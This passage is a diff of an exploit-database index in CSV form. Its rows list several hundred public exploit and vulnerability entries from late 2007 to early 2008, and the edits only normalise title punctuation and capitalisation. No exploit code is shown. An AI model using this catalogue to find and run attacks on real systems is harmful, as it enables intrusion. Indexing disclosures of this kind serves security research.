Groebert",php,webapps,0 4806,platforms/windows/remote/4806.html,"Persits Software XUpload Control AddFolder() Buffer Overflow Exploit",2007-12-28,Elazar,windows,remote,0 4807,platforms/php/webapps/4807.php,"jPORTAL 2.3.1 & UserPatch (forum.php) Remote Code Execution Exploit",2007-12-29,irk4z,php,webapps,0 -4808,platforms/php/webapps/4808.txt,"Mihalism Multi Forum Host <= 3.0.x Remote File Inclusion Vulnerability",2007-12-29,GoLd_M,php,webapps,0 +4808,platforms/php/webapps/4808.txt,"Mihalism Multi Forum Host <= 3.0.x - Remote File Inclusion Vulnerability",2007-12-29,GoLd_M,php,webapps,0 4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo Remote SQL Injection Exploit",2007-12-29,Pr0metheuS,php,webapps,0 4810,platforms/php/webapps/4810.txt,"CMS Made Simple <= 1.2.2 - (TinyMCE module) SQL Injection Vuln",2007-12-30,EgiX,php,webapps,0 4811,platforms/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion Vulnerability",2007-12-30,bd0rk,php,webapps,0 4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 download.php Remote File Disclosure Vuln",2007-12-30,GoLd_M,php,webapps,0 -4813,platforms/php/webapps/4813.txt,"XCMS <= 1.83 Remote Command Execution Exploit",2007-12-30,x0kster,php,webapps,0 +4813,platforms/php/webapps/4813.txt,"XCMS <= 1.83 - Remote Command Execution Exploit",2007-12-30,x0kster,php,webapps,0 4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS Remote File Upload / Disclosure Vulnerabilities",2007-12-30,BugReport.IR,php,webapps,0 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion Vulnerability",2007-12-30,Crackers_Child,php,webapps,0 4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 (p) Local File Inclusion Vulnerability",2007-12-30,jackal,php,webapps,0 @@ -4464,7 +4464,7 @@ id,file,description,date,author,platform,type,port 4821,platforms/php/webapps/4821.txt,"IPTBB <= 0.5.4 (viewdir id) Remote SQL Injection Vulnerability",2007-12-31,MhZ91,php,webapps,0 4822,platforms/php/webapps/4822.txt,"MyPHP Forum <= 3.0 (Final) Multiple SQL Injection Vulnerabilities",2007-12-31,x0kster,php,webapps,0 4823,platforms/php/webapps/4823.pl,"Zenphoto 1.1.3 (rss.php albumnr) Remote SQL Injection Exploit",2007-12-31,Silentz,php,webapps,0 -4824,platforms/asp/webapps/4824.py,"oneSCHOOL (all versions) admin/login.asp SQL Injection exploit",2007-12-31,Guga360,asp,webapps,0 +4824,platforms/asp/webapps/4824.py,"oneSCHOOL (all versions) admin/login.asp SQL Injection Exploit",2007-12-31,Guga360,asp,webapps,0 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 API ActiveX Control BoF Exploit",2007-12-31,Elazar,windows,remote,0 4826,platforms/php/webapps/4826.pl,"WebPortal CMS <= 0.6.0 (index.php m) Remote SQL Injection Exploit",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade <= 2.1.3 - SQL Injection Vulnerability",2007-12-31,Houssamix,php,webapps,0 @@ -4490,10 +4490,10 @@ id,file,description,date,author,platform,type,port 4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract RFI Vulnerability",2008-01-06,"Eugene Minaev",php,webapps,0 4848,platforms/asp/webapps/4848.txt,"portalapp 4.0 (sql/xss/auth bypasses) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0 4849,platforms/php/webapps/4849.txt,"LoudBlog <= 0.6.1 (parsedpage) Remote Code Execution Vulnerability",2008-01-06,"Eugene Minaev",php,webapps,0 -4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x (go.php) Remote File Disclosure Vulnerability",2008-01-06,"Eugene Minaev",php,webapps,0 +4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - (go.php) Remote File Disclosure Vulnerability",2008-01-06,"Eugene Minaev",php,webapps,0 4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 (html.php) Remote Code Execution Vulnerability",2008-01-06,"Eugene Minaev",php,webapps,0 4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 (xss/sql) Multiple Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0 -4853,platforms/php/webapps/4853.php,"DCP-Portal <= 6.11 Remote SQL Injection Exploit",2008-01-06,x0kster,php,webapps,0 +4853,platforms/php/webapps/4853.php,"DCP-Portal <= 6.11 - Remote SQL Injection Exploit",2008-01-06,x0kster,php,webapps,0 4854,platforms/php/webapps/4854.txt,"SineCMS <= 2.3.5 - Local File Inclusion / RCE Vulnerabilities",2008-01-06,KiNgOfThEwOrLd,php,webapps,0 4855,platforms/php/webapps/4855.txt,"Shop-Script 2.0 index.php Remote File Disclosure Vulnerability",2008-01-06,Fisher762,php,webapps,0 4856,platforms/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - Denial of Service Exploit (no-steam)",2008-01-06,"Eugene Minaev",multiple,dos,0 @@ -4519,7 +4519,7 @@ id,file,description,date,author,platform,type,port 4877,platforms/multiple/remote/4877.txt,"SAP MaxDB <= 7.6.03.07 pre-auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0 4879,platforms/php/webapps/4879.php,"Docebo <= 3.5.0.3 (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0 -4880,platforms/php/webapps/4880.php,"DomPHP <= 0.81 Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 +4880,platforms/php/webapps/4880.php,"DomPHP <= 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 Remote ICMP Kernel Crash Exploit",2008-01-10,kingcope,solaris,dos,0 4882,platforms/php/webapps/4882.txt,"MTCMS <= 2.0 - Remote SQL Injection Vulnerabilities",2008-01-10,"Virangar Security",php,webapps,0 4883,platforms/php/webapps/4883.txt,"DomPHP 0.81 (index.php page) Remote File Inclusion Vulnerability",2008-01-10,Houssamix,php,webapps,0 @@ -4562,22 +4562,22 @@ id,file,description,date,author,platform,type,port 4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 (effect.php page) Local File Inclusion Vulnerability",2008-01-16,DSecRG,php,webapps,0 4921,platforms/asp/webapps/4921.txt,"MailBee WebMail Pro 4.1 (ASP.NET) Remote File Disclosure Vulnerability",2008-01-16,-=M.o.B=-,asp,webapps,0 4922,platforms/php/webapps/4922.txt,"alitalk 1.9.1.1 - Multiple Vulnerabilities",2008-01-16,tomplixsee,php,webapps,0 -4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 +4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4924,platforms/php/webapps/4924.php,"PixelPost 1.7 - Remote Blind SQL Injection Exploit",2008-01-16,Silentz,php,webapps,0 4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 (Search) Remote SQL Injection Vulnerability",2008-01-16,IRCRASH,php,webapps,0 4926,platforms/php/webapps/4926.pl,"Gradman <= 0.1.3 (agregar_info.php) Local File Inclusion Exploit",2008-01-16,JosS,php,webapps,0 4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit",2008-01-16,Silentz,php,webapps,0 -4928,platforms/php/webapps/4928.txt,"mybulletinboard (mybb) <= 1.2.10 Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 +4928,platforms/php/webapps/4928.txt,"mybulletinboard (mybb) <= 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 (id) Remote SQL Injection Vulnerability",2008-01-17,Stack,php,webapps,0 4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 (upload.php language) LFI Vulnerability",2008-01-17,Scary-Boys,php,webapps,0 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 (Enterprise Tree Control) ActiveX BOF/DoS",2008-01-17,shinnai,windows,dos,0 4932,platforms/windows/remote/4932.html,"Digital Data Communications (RtspVaPgCtrl) Remote BOF Exploit",2008-01-17,rgod,windows,remote,0 -4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 (stat.php) Remote Code Execution Exploit",2008-01-18,k1tk4t,php,webapps,0 +4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit",2008-01-18,k1tk4t,php,webapps,0 4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service RPC BOF Exploit (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 rtlabel_id2name() Local Null Pointer Dereference DoS",2008-01-18,Hunger,bsd,dos,0 4936,platforms/php/webapps/4936.txt,"Gradman <= 0.1.3 (info.php tabla) Local File Inclusion Vulnerability",2008-01-18,Syndr0me,php,webapps,0 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 (linkbar.php cfile) Remote File Inclusion Vulnerability",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 -4938,platforms/windows/local/4938.py,"MS Visual Basic Enterprise Ed. 6 SP6 .dsr File Handling BOF Exploit",2008-01-18,shinnai,windows,local,0 +4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 .dsr File Handling BOF Exploit",2008-01-18,shinnai,windows,local,0 4939,platforms/php/webapps/4939.txt,"Wordpress plugin WP-Forum 1.7.4 - Remote SQL Injection Vulnerability",2008-01-19,"websec Team",php,webapps,0 4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 (upload.php language) Local File Inclusion Exploit",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 Auth Bypass Vulnerability",2008-01-20,DarkFig,hardware,remote,0 @@ -4600,14 +4600,14 @@ id,file,description,date,author,platform,type,port 4958,platforms/php/webapps/4958.txt,"aflog 1.01 comments.php XSS / SQL Injection Vulnerability",2008-01-22,shinmai,php,webapps,0 4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit",2008-01-22,Elazar,windows,remote,0 4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe (categoryid) Remote SQL Injection Vulnerability",2008-01-22,S@BUN,php,webapps,0 -4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery <= 1.4.14 Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 +4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery <= 1.4.14 - Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 (setcms.org) Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 4963,platforms/php/webapps/4963.pl,"YaBB SE <= 1.5.5 - Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 (sid) Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4965,platforms/php/webapps/4965.php,"PHP-Nuke <= 8.0 Final (sid) Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4966,platforms/php/webapps/4966.pl,"Invision Gallery <= 2.0.7 - Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control ActiveX Remote Buffer Overflow Exploit",2008-01-22,Elazar,windows,remote,0 -4968,platforms/php/webapps/4968.txt,"Foojan WMS 1.0 (index.php story) Remote SQL Injection Vulnerability",2008-01-23,IRCRASH,php,webapps,0 +4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 (index.php story) Remote SQL Injection Vulnerability",2008-01-23,IRCRASH,php,webapps,0 4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability",2008-01-23,IRCRASH,php,webapps,0 4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums <= 9.07 (sub) Remote Directory Traversal Vulnerability",2008-01-23,BugReport.IR,asp,webapps,0 4971,platforms/asp/webapps/4971.txt,"web wiz rich text editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 @@ -4616,20 +4616,20 @@ id,file,description,date,author,platform,type,port 4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 ExecuteStr() Remote Command Execution Exploit",2008-01-23,h07,windows,remote,0 4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite (newlang) Local File Inclusion Vulnerability",2008-01-23,The_HuliGun,php,webapps,0 4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 (update) Local File Inclusion Vulnerability",2008-01-23,Stack,php,webapps,0 -4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 Remote Directory Traversal Vulnerability",2008-01-23,"Arno Toll",cgi,webapps,0 +4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Remote Directory Traversal Vulnerability",2008-01-23,"Arno Toll",cgi,webapps,0 4978,platforms/hardware/dos/4978.html,"Apple iPhone 1.1.2 - Remote Denial of Service Exploit",2008-01-24,c0ntex,hardware,dos,0 4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control Buffer Overflow Exploit",2008-01-24,Elazar,windows,remote,0 4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 (optimizer.php files) Remote File Disclosure Vulnerability",2008-01-24,fuzion,php,webapps,0 4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 FileUploader Class InsecureMethod PoC",2008-01-24,rgod,windows,remote,0 4982,platforms/windows/remote/4982.html,"Gateway WebLaunch ActiveX Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 -4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 Remote SQL Injection Vulnerability",2008-01-25,0in,php,webapps,0 +4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - Remote SQL Injection Vulnerability",2008-01-25,0in,php,webapps,0 4985,platforms/php/webapps/4985.txt,"flinx <= 1.3 (category.php id) Remote SQL Injection Vulnerability",2008-01-25,Houssamix,php,webapps,0 4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 NamoInstaller.dll install Method Exploit",2008-01-25,plan-s,windows,remote,0 4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 AddFile() Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 -4988,platforms/asp/webapps/4988.txt,"candypress ecommerce suite 4.1.1.26 Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 +4988,platforms/asp/webapps/4988.txt,"candypress ecommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 4989,platforms/php/webapps/4989.txt,"simple forum 3.2 (fd/xss) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 Numerous Remote SQL Injection Vulnerabilities",2008-01-26,"Charles Hooper",php,webapps,0 -4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 Multiple Local File Inclusion Vulnerabilities",2008-01-26,Stack,php,webapps,0 +4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion Vulnerabilities",2008-01-26,Stack,php,webapps,0 4992,platforms/php/webapps/4992.txt,"Wordpress Plugin WP-Cal 0.3 editevent.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 4993,platforms/php/webapps/4993.txt,"Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 @@ -4657,13 +4657,13 @@ id,file,description,date,author,platform,type,port 5016,platforms/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - Remote SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0 5017,platforms/php/webapps/5017.php,"Wordpress Plugin WassUp 1.4.3 (spy.php to_date) SQL Injection Exploit",2008-01-30,enter_the_dragon,php,webapps,0 5018,platforms/php/webapps/5018.pl,"ibProArcade <= 3.3.0 - Remote SQL Injection Exploit",2008-01-30,RST/GHC,php,webapps,0 -5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 Remote Command Execution Exploit",2008-01-30,waraxe,php,webapps,0 +5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution Exploit",2008-01-30,waraxe,php,webapps,0 5020,platforms/php/webapps/5020.txt,"Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities",2008-01-30,Crackers_Child,php,webapps,0 5021,platforms/php/webapps/5021.txt,"PHP Links <= 1.3 (vote.php id) Remote SQL Injection Vulnerability",2008-01-30,Houssamix,php,webapps,0 5022,platforms/php/webapps/5022.txt,"PHP Links <= 1.3 smarty.php Remote File Inclusion Vulnerability",2008-01-30,Houssamix,php,webapps,0 5025,platforms/windows/remote/5025.html,"MySpace Uploader (MySpaceUploader.ocx 1.0.0.4) BOF Exploit",2008-01-31,Elazar,windows,remote,0 -5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 Multiple Remote File Inclusion Vulnerabilities",2008-01-31,"David Wharton",php,webapps,0 -5027,platforms/php/webapps/5027.txt,"sflog! 0.96 Remote File Disclosure Vulnerabilities",2008-01-31,muuratsalo,php,webapps,0 +5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion Vulnerabilities",2008-01-31,"David Wharton",php,webapps,0 +5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure Vulnerabilities",2008-01-31,muuratsalo,php,webapps,0 5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0 5029,platforms/php/webapps/5029.txt,"Mambo Component AkoGallery 2.5b SQL Injection Vulnerability",2008-01-31,S@BUN,php,webapps,0 5030,platforms/php/webapps/5030.txt,"Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability",2008-01-31,S@BUN,php,webapps,0 @@ -4676,7 +4676,7 @@ id,file,description,date,author,platform,type,port 5037,platforms/php/webapps/5037.txt,"The Everything Development System <= Pre-1.0 - SQL Injection Vuln",2008-02-02,sub,php,webapps,0 5039,platforms/php/webapps/5039.txt,"Wordpress Plugin Wordspew Remote SQL Injection Vulnerability",2008-02-02,S@BUN,php,webapps,0 5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability",2008-02-02,S@BUN,php,webapps,0 -5041,platforms/php/webapps/5041.txt,"phpShop <= 0.8.1 - Remote SQL injection / Filter Bypass Vulnerabilities",2008-02-02,"the redc0ders",php,webapps,0 +5041,platforms/php/webapps/5041.txt,"phpShop <= 0.8.1 - Remote SQL Injection / Filter Bypass Vulnerabilities",2008-02-02,"the redc0ders",php,webapps,0 5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-02,IRCRASH,php,webapps,0 5043,platforms/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BOF PoC Exploit",2008-02-02,h07,windows,dos,0 5044,platforms/windows/dos/5044.pl,"IpSwitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow PoC",2008-02-03,securfrog,windows,dos,0 @@ -4714,7 +4714,7 @@ id,file,description,date,author,platform,type,port 5076,platforms/php/webapps/5076.txt,"Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0 5077,platforms/windows/local/5077.cpp,"Total Video Player 1.20 M3U File Local Stack Buffer Overflow Exploit",2008-02-07,"fl0 fl0w",windows,local,0 5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager <= 7.0.1 File Upload Exploit",2008-02-07,titon,windows,remote,0 -5079,platforms/windows/remote/5079.c,"SapLPD 6.28 Remote Buffer Overflow Exploit (win32)",2008-02-07,BackBone,windows,remote,515 +5079,platforms/windows/remote/5079.c,"SapLPD 6.28 - Remote Buffer Overflow Exploit (win32)",2008-02-07,BackBone,windows,remote,515 5080,platforms/php/webapps/5080.txt,"Joomla Component com_doc Remote SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0 5081,platforms/php/webapps/5081.txt,"Joomla Component com_noticias 1.0 - SQL Injection Vulnerability",2008-02-07,xcorpitx,php,webapps,0 5082,platforms/php/webapps/5082.txt,"PowerNews (Newsscript) 2.5.6 - Local File Inclusion Vulnerabilities",2008-02-08,DSecRG,php,webapps,0 @@ -4726,11 +4726,11 @@ id,file,description,date,author,platform,type,port 5088,platforms/php/webapps/5088.py,"Limbo CMS <= 1.0.4.2 Cuid cookie Blind SQL Injection Exploit",2008-02-09,The:Paradox,php,webapps,0 5089,platforms/php/webapps/5089.txt,"DomPHP 0.82 (index.php page) Local File Inclusion Vulnerability",2008-02-09,Houssamix,php,webapps,0 5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 -5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 (last_module) Remote Code Execution exploit",2008-02-09,Iron,php,webapps,0 +5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - vmsplice Local Root Exploit",2008-02-09,qaaz,linux,local,0 5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit",2008-02-09,qaaz,linux,local,0 5094,platforms/php/webapps/5094.txt,"Mambo Component Comments <= 0.5.8.5g SQL Injection Vulnerability",2008-02-09,CheebaHawk215,php,webapps,0 -5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0 +5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 - XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0 5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability",2008-02-10,"SoSo H H",php,webapps,0 5097,platforms/php/webapps/5097.txt,"SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability",2008-02-10,GoLd_M,php,webapps,0 5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability",2008-02-10,GoLd_M,php,webapps,0 @@ -4747,7 +4747,7 @@ id,file,description,date,author,platform,type,port 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - SEH Overwrite Exploit",2008-02-13,Elazar,windows,remote,0 -5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 +5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 (Firmware <= 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 BETA - XSS / SQL Injection Exploit",2008-02-14,IRCRASH,php,webapps,0 5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 (threads.php ssid) SQL Injection Vulnerability",2008-02-14,IRCRASH,php,webapps,0 @@ -4765,13 +4765,13 @@ id,file,description,date,author,platform,type,port 5127,platforms/php/webapps/5127.txt,"Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 5128,platforms/php/webapps/5128.txt,"Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability",2008-02-15,Don,php,webapps,0 5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability",2008-02-16,GoLd_M,php,webapps,0 -5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 Multiple Remote SQL Injection Exploit",2008-02-16,NTOS-Team,php,webapps,0 +5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple Remote SQL Injection Exploit",2008-02-16,NTOS-Team,php,webapps,0 5131,platforms/php/webapps/5131.pl,"Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit",2008-02-16,JosS,php,webapps,0 5132,platforms/php/webapps/5132.txt,"Joomla Component jooget <= 2.6.8 - Remote SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - Remote SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 5134,platforms/php/webapps/5134.txt,"Joomla Component com_galeria Remote SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 5135,platforms/php/webapps/5135.txt,"Wordpress Photo album Remote SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 -5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability",2008-02-17,ZoRLu,php,webapps,0 +5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Remote File Upload Vulnerability",2008-02-17,ZoRLu,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability",2008-02-17,GoLd_M,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability",2008-02-18,ka0x,php,webapps,0 5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability",2008-02-18,"it's my",php,webapps,0 @@ -4799,7 +4799,7 @@ id,file,description,date,author,platform,type,port 5161,platforms/php/webapps/5161.txt,"PHP-Nuke Module Docum (artid) SQL Injection Vulnerability",2008-02-20,DamaR,php,webapps,0 5162,platforms/php/webapps/5162.txt,"Globsy 1.0 (file) Remote File Disclosure Vulnerability",2008-02-20,GoLd_M,php,webapps,0 5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt (cid) SQL Injection Vulnerability",2008-02-20,Crackers_Child,php,webapps,0 -5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x Remote Blind SQL Injection Exploit",2008-02-20,NBBN,php,webapps,0 +5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Remote Blind SQL Injection Exploit",2008-02-20,NBBN,php,webapps,0 5165,platforms/php/webapps/5165.php,"PunBB <= 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0 5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 (productdetails.php) Remote SQL Injection Exploit",2008-02-20,t0pP8uZz,php,webapps,0 5167,platforms/linux/local/5167.sh,"X.Org xorg-x11-xfs <= 1.0.2-3.1 - Local Race Condition Exploit",2008-02-21,vl4dZ,linux,local,0 @@ -4824,10 +4824,10 @@ id,file,description,date,author,platform,type,port 5186,platforms/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability",2008-02-25,xcorpitx,php,webapps,0 5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability",2008-02-25,S@BUN,asp,webapps,0 5188,platforms/windows/remote/5188.html,"Rising Antivirus Online Scanner Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0 -5189,platforms/php/webapps/5189.pl,"DBHcms <= 1.1.4 - Remote File Inclusion exploit",2008-02-25,Iron,php,webapps,0 +5189,platforms/php/webapps/5189.pl,"DBHcms <= 1.1.4 - Remote File Inclusion Exploit",2008-02-25,Iron,php,webapps,0 5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control BOF Exploit",2008-02-26,Elazar,windows,remote,0 5191,platforms/multiple/dos/5191.c,"Apple Mac OS X xnu <= 1228.3.13 - IPv6-ipcomp Remote kernel DoS PoC",2008-02-26,mu-b,multiple,dos,0 -5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0 +5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0 5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5) BOF Exploit",2008-02-26,rgod,windows,remote,0 5194,platforms/php/webapps/5194.txt,"Wordpress Plugin Sniplets 1.1.2 